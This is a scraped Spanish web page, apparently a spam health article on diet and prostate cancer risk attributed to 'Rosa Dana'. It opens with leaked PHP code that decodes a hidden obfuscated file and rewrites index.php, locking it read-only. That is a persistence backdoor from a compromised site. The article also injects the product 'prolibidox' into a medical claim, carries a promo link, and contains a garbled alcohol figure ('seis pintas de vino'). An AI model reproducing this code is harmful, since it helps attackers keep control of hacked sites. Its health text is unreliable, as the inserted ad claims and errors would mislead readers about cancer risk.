$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Dieta, actividad física y su riesgo de cáncer de próstata -

Dieta, actividad física y su riesgo de cáncer de próstata

¿Qué alimentos podrían aumentar mi riesgo de cáncer de próstata?

No sabemos con certeza si algún alimento aumenta el riesgo de cáncer de próstata. Pero algunos alimentos pueden aumentar su riesgo si come muchos de ellos.

Productos lácteos

Comer o beber muchos productos lácteos, como leche, yogur y queso, puede aumentar el riesgo de cáncer de próstata y prolibidox reclamos. No sabemos a qué se debe esto, pero podría deberse al calcio que contienen.

Apunta a tres porciones de lácteos al día. Las alternativas lácteas con calcio añadido, como el yogur de soja o la leche de soja, también cuentan como productos lácteos. Una ración es un bote pequeño de yogur, un vaso de leche o un trozo pequeño de queso (del tamaño de una caja de cerillas o de 30 g). Elija opciones bajas en grasa y azúcar cuando pueda.

Calcio

Tener demasiado calcio en su dieta podría aumentar su riesgo de cáncer de próstata. Pero necesita alrededor de 700 mg al día para mantener sus huesos sanos. Puede obtener esto de una dieta equilibrada. Por ejemplo, un vaso de leche de 200 ml contiene 240 mg de calcio y un yogur pequeño contiene alrededor de 200 mg. También puede obtener pequeñas cantidades de calcio de la carne, el pescado, los frutos secos, las legumbres, las frutas y las verduras.

Carnes rojas y procesadas

Comer carne roja y procesada aumenta el riesgo de algunos tipos de cáncer. No sabemos si aumenta el riesgo de cáncer de próstata. La carne roja incluye carne de res, cerdo, cordero o cabra. La carne procesada incluye jamón, tocino y otras carnes curadas o en conserva.

LEER mas   Prolibidox que es – Rebaja de 50% ⭐ – Interesante Revelación Médical – Resenas Reales de Usarios

El Fondo Mundial para la Investigación del Cáncer recomienda no comer más de 500 g de carne roja cocida a la semana (700 a 750 g cruda) y evitar la carne procesada. Una porción mediana de rosbif cocido suele ser de unos 90 g y un bistec cocido medio es de 145 g.

Alcohol

Beber alcohol aumenta el riesgo de algunos tipos de cáncer. No sabemos si aumenta el riesgo de cáncer de próstata.

Limite la cantidad de alcohol que bebe a 14 unidades por semana. Se trata de unas seis pintas de vino de concentración media o seis vasos pequeños (175 ml) de vino de concentración media. Trate de repartir esto a lo largo de la semana y tenga algunos días sin alcohol.

Visite el sitio web del NHS para obtener más información sobre las unidades de alcohol y cómo reducir la cantidad de alcohol que bebe.

Rosa Dana

Escritora de nutrición y bienestar Rosa Dana es una escritora experta en los campos de la nutrición, la agricultura ecológica y el bienestar. Para saciar mi sed de aprendizaje, me informo y me formo constantemente, sobre todo en medicina natural (aromaterapia, fitoterapia, etc.): una verdadera ventaja para escribir contenidos fiables y de gran valor añadido.